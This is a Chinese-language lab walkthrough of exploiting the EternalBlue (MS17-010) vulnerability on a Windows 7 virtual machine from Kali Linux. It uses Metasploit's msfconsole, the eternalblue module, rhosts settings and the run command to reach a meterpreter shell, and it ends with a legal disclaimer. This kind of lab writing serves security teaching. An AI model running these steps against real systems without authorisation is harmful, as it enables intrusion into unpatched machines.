Metasploit简介
Metasploit是一款开源的安全漏洞检测工具,也是我们这次渗透实验使用的工具。
永恒之蓝[ms17_010]简介
- 永恒之蓝是一种计算机网络安全漏洞。它主要影响Windows操作系统,包括本次的实验对象Windows7。
- [ms17_010]:windows2017年的第10号漏洞
实验环境
- 物理机安装vmware虚拟机
- vmware虚拟机上安装KALI linux
- vmware虚拟机上安装Windows7x64位版本
- 本次实验攻击机和靶机防火墙均已关闭
实验过程
-
root@kali:~# msfconsole
### msfconsole是Metasploit的控制台接口,它是一个用于渗透测试和安全评估的框架。通过运行msfconsole命令,可以启用Metasploit的命令行界面。
-
msf6 > search ms17_010
### search命令的参数是ms17_010,它会搜索相关的模块。
### 本次实验调用Name为0的模块
### 输入命令show options 查看攻击参数
标红一处是靶机的ip
标红二处是攻击机ip
ping <靶机ip>
### 测试目标连通性
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts <靶机ip>
### 设置靶机ip
再次show options 检查必须选项是否准备完成
### 输入run开始攻击
### 进入meterpreter就拿到了靶机权限,本次实验完毕。
法律声明
声明:
请注意,本文档包含有关已知漏洞的描述和复现方法。这些信息仅用于教育和研究目的,不得用于任何未经授权的活动。
本声明如下:
-
本人对使用本文档中的信息所产生的任何后果概不负责。任何人使用本文档中的信息应自行承担所有风险。
-
本文档中的信息不得用于未经授权的任何活动,包括但不限于未经授权的攻击行为。任何使用本文档中的信息进行未经授权的活动将违反法律,并可能导致法律后果。
-
本文档中的信息仅为教育和研究目的而提供,并且可能包含机密和保密信息。阅读和使用本文档的信息应遵守适用的法律和法规。
-
请遵守道德原则并报告您发现的任何漏洞给相关方,以促进软件和系统的安全。
-
请注意,本文档中的信息可能已过时,因为软件和系统可能已经修复了相关漏洞。
特此声明。